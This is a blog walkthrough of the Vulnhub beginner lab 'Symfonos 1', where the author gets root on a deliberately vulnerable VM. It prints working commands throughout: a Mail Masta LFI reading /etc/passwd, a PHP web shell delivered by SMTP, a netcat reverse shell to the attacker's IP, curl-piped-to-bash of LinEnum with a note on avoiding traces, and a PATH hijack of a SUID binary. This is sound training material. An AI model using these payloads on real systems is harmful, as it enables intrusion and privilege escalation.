6 July 2022

Pentesting Fun Stuff

following the cyber security path…

Symfonos 1

This VM is recently added to vulnhub and is advertised as a real life based machine designed to teach a interesting way of obtaining a low priv shell. The level is beginner, but as it is the first part of a serie I like to do every part.

Enumeration

Starting with a portscan to get a view on what kind of ports are open on the system and what services are running behind them.

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:2A:D4:AA (VMware)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m57s, deviation: 2h53m12s, median: -2s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2019-08-01T04:16:29-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-08-01 11:16:29
|_  start_date: N/A

These ports are open:

  • port 22, which runs a recent version of OpenSSH
  • port 25, which runs a PostFix SMTP server (from the scan there is no version number available)
  • port 80, which runs a Apache2 webserver version 2.4.25
  • port 139, NetBIOS session client version 3.x – 4.x
  • port 445, Samba version 4.5.16-Debian

Webserver

Let’s start with the webserver first. The website itself is nothing more then a picture. There is nothing in the source and the picture itself seems to hold no hidden features.

root@cyberspace:~/symfonos1# dirsearch -u http://10.10.10.10 -e html,htm,php,txt -x 403,404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: html, htm, php, txt | HTTP method: get | Threads: 10 | Wordlist size: 207627

Error Log: /opt/tools/dirsearch/logs/errors-19-08-01_11-38-22.log

Target: http://10.10.10.10

[11:38:22] Starting: 
[11:38:22] 200 -  328B  - /
[11:38:24] 301 -  311B  - /manual  ->  http://10.10.10.10/manual/

Task Completed

DirSearch nor Nikto show something interesting. For now, I turn my focus to another port.

Samba

To enumerate an SMB server I use smbmap.

root@cyberspace:~/symfonos1# smbmap -r -H 10.10.10.10
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.10...
[+] IP: 10.10.10.10:445	Name: 10.10.10.10                                       
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	helios                                            	NO ACCESS
	anonymous                                         	READ ONLY
	./                                                 
	dr--r--r--                0 Sat Jun 29 03:14:49 2019	.
	dr--r--r--                0 Sat Jun 29 03:12:15 2019	..
	fr--r--r--              154 Sat Jun 29 03:14:49 2019	attention.txt
	IPC$                                              	NO ACCESS

It looks like there is a document that I can download.

root@cyberspace:~/symfonos1/smb# smbclient \\\\10.10.10.10\\anonymous
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 03:14:49 2019
  ..                                  D        0  Sat Jun 29 03:12:15 2019
  attention.txt                       N      154  Sat Jun 29 03:14:49 2019

		19994224 blocks of size 1024. 17259504 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (75.2 KiloBytes/sec) (average 75.2 KiloBytes/sec)
smb: \> quit
root@cyberspace:~/symfonos1/smb# cat attention.txt 

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

That’s a nice hint about certain passwords. Also the name Zeus could mean the usernames are Greek gods. Let’s put these so called passwords into a file. One of the shares is called helios. Let’s see if helios also uses a weak password.

root@cyberspace:~/symfonos1# smbclient \\\\10.10.10.10\\helios -U helios
Enter WORKGROUP\helios's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jun 29 02:32:05 2019
  ..                                  D        0  Sat Jun 29 02:37:04 2019
  research.txt                        A      432  Sat Jun 29 02:32:05 2019
  todo.txt                            A       52  Sat Jun 29 02:32:05 2019

		19994224 blocks of size 1024. 17259504 blocks available
smb: \> get research.txt 
getting file \research.txt of size 432 as research.txt (140.6 KiloBytes/sec) (average 140.6 KiloBytes/sec)
smb: \> get todo.txt 
getting file \todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 94.5 KiloBytes/sec)

Looks like the user ‘helios’ uses one of the weak passwords.

root@cyberspace:~/symfonos1/smb# cat research.txt 
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
root@cyberspace:~/symfonos1/smb# cat todo.txt 

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

Looks like he is working on a folder called /h3l105. Let’s check if this folder exists on the webserver.

WordPress

root@cyberspace:~/symfonos1# dirsearch -u 10.10.10.10/h3l105 -e php -f -x 403,404

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 10301

Error Log: /opt/tools/dirsearch/logs/errors-19-08-01_12-16-51.log

Target: 10.10.10.10/h3l105

[12:16:51] Starting: 
[12:17:03] 301 -    0B  - /h3l105/index.php  ->  http://10.10.10.10/h3l105/
[12:17:03] 301 -    0B  - /h3l105/index.php/  ->  http://10.10.10.10/h3l105/
[12:17:12] 200 -    0B  - /h3l105/wp-content/
[12:17:12] 500 -    3KB - /h3l105/wp-admin/setup-config.php/
[12:17:12] 302 -    0B  - /h3l105/wp-admin/  ->  http://symfonos.local/h3l105/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.10%2Fh3l105%2Fwp-admin%2F&reauth=1
[12:17:12] 200 -    0B  - /h3l105/wp-config.php
[12:17:12] 200 -   69B  - /h3l105/wp-content/plugins/akismet/akismet.php/
[12:17:12] 200 -    1KB - /h3l105/wp-admin/install.php/
[12:17:12] 200 -    1KB - /h3l105/wp-content/uploads/
[12:17:12] 500 -    0B  - /h3l105/wp-includes/rss-functions.php/
[12:17:12] 200 -   44KB - /h3l105/wp-includes/
[12:17:12] 200 -    3KB - /h3l105/wp-login.php/
[12:17:12] 200 -    3KB - /h3l105/wp-login.php
[12:17:12] 405 -   42B  - /h3l105/xmlrpc.php/

Task Completed

Looks like a wordpress site. When running wpscan I get several vulnerabilities and an username (admin).

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8609
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://cxsecurity.com/issue/WLB-2016080220
 |
 | [!] Title: Mail Masta 1.0 - Multiple SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8740
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
 |      - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
root@cyberspace:~/symfonos1/web# searchsploit mail masta
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion                                                                                                                    | exploits/php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection                                                                                                                           | exploits/php/webapps/41438.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Here the information about the possible exploits are available. The LFI can be easily tested.

root@cyberspace:~/symfonos1/web# curl -s http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:111::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false

Looks like this works. But for this vulnerability to be useful, I need either files with credentials or to upload a payload that I can trigger.

SMTP

Because of the /etc/passwd file, I know there is a user named helios. I can try and send this user a message with the mail server. The content of this message will be a web shell which hopefully will give me the opportunity to execute with the LFI. Information about web shells are numerous on the internet. Here is an example.

root@cyberspace:~/symfonos1# nc 10.10.10.10 25
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO
501 Syntax: HELO hostname
MAIL FROM: n0w4n
250 2.1.0 Ok
RCPT TO: helios
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as A57AF408A1
QUIT
221 2.0.0 Bye

Starting up a listener.

root@cyberspace:~/symfonos1# nc -lvnp 9001
listening on [any] 9001 ...

And now to activate the payload.

root@cyberspace:~/symfonos1# curl -s "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc 10.10.10.13 9001 -e /bin/bash"
root@cyberspace:~/symfonos1# nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.10.13] from (UNKNOWN) [10.10.10.10] 54432

Escalation of Privileges

id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
python -c 'import pty;pty.spawn("/bin/bash");'
<ml/h3l105/wp-content/plugins/mail-masta/inc/lists$

To do a fast enumeration of the system, I use a shell script called “LinEnum”. To run it on the remote system I run a PythonSimpleHTTPServer on my local system and curl it from the remote system. Because I pipe it to bash, I don’t have to download the file to the system, which leaves traces.

helios@symfonos:/tmp$ curl -s http://10.10.10.13:9002/linenum.sh | bash

There is a lot of information, but the most interesting part is a file with the SUID bit set.

helios@symfonos:/tmp$ find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
< -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jun  9 16:42 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 440728 Mar  1 10:19 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 59680 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75792 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40312 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 40504 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 50040 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 8640 Jun 28 20:21 /opt/statuscheck
-rwsr-xr-x 1 root root 44304 Mar  7  2018 /bin/mount
-rwsr-xr-x 1 root root 31720 Mar  7  2018 /bin/umount
-rwsr-xr-x 1 root root 40536 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 61240 Nov 10  2016 /bin/ping

The file of interest is /opt/statuscheck. This is not a well-known SUID file and should be investigated more.

helios@symfonos:/tmp$ file /opt/statuscheck
file /opt/statuscheck
/opt/statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 15:28:28 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html

Looks like the return of a curl command.

helios@symfonos:/tmp$ curl -I 10.10.10.10
curl -I 10.10.10.10
HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 15:30:47 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html

Now to use this to my advantage. For this I will use the PATH variable. First I create a file called curl, because I know that the program statuscheck calls on curl and set all the bits.

helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl
chmod 777 curl

Then I add /tmp to PATH. This way statuscheck will look for the first folder in PATH which contains the file curl. Because /tmp is first, it will think this is the correct curl which it needs to execute.

helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH

Then run the program and get root.

helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
# whoami
whoami
root

Now to finish this challenge.

# cat proof.txt
cat proof.txt

	Congrats on rooting symfonos:1!

                 \ __
--==/////////////[})))==*
                 / \ '          ,|
                    `\`\      //|                             ,|
                      \ `\  //,/'                           -~ |
   )             _-~~~\  |/ / |'|                       _-~  / ,
  ((            /' )   | \ / /'/                    _-~   _/_-~|
 (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
 ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
 ((\~\           |    )   | '      /        __--~~  \-~~ _-~
    `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
     (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
      ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                   ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                   ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                  ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                  ;;;;'     (      ---~~/         `:::|       `\\.      
                  |'  _      `----~~~~'      /      `:|        ()))),      
            ______/\/~    |                 /        /         (((((())  
          /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
         / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
        //  \ \                        /  |  \;;,\                 `   
       (<_    \ \                    /',/-----'  _> 
        \_|     \\_                 //~;~~~~~~~~~ 
                 \_|               (,~~   
                                    \~\
                                     ~~

	Contact me via Twitter @zayotic to give feedback!

This was a nice challenge to start with. Because there are two more, Symfonos 2 will be next. A thanks to @zayotic for a fun challenge.

 

 

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.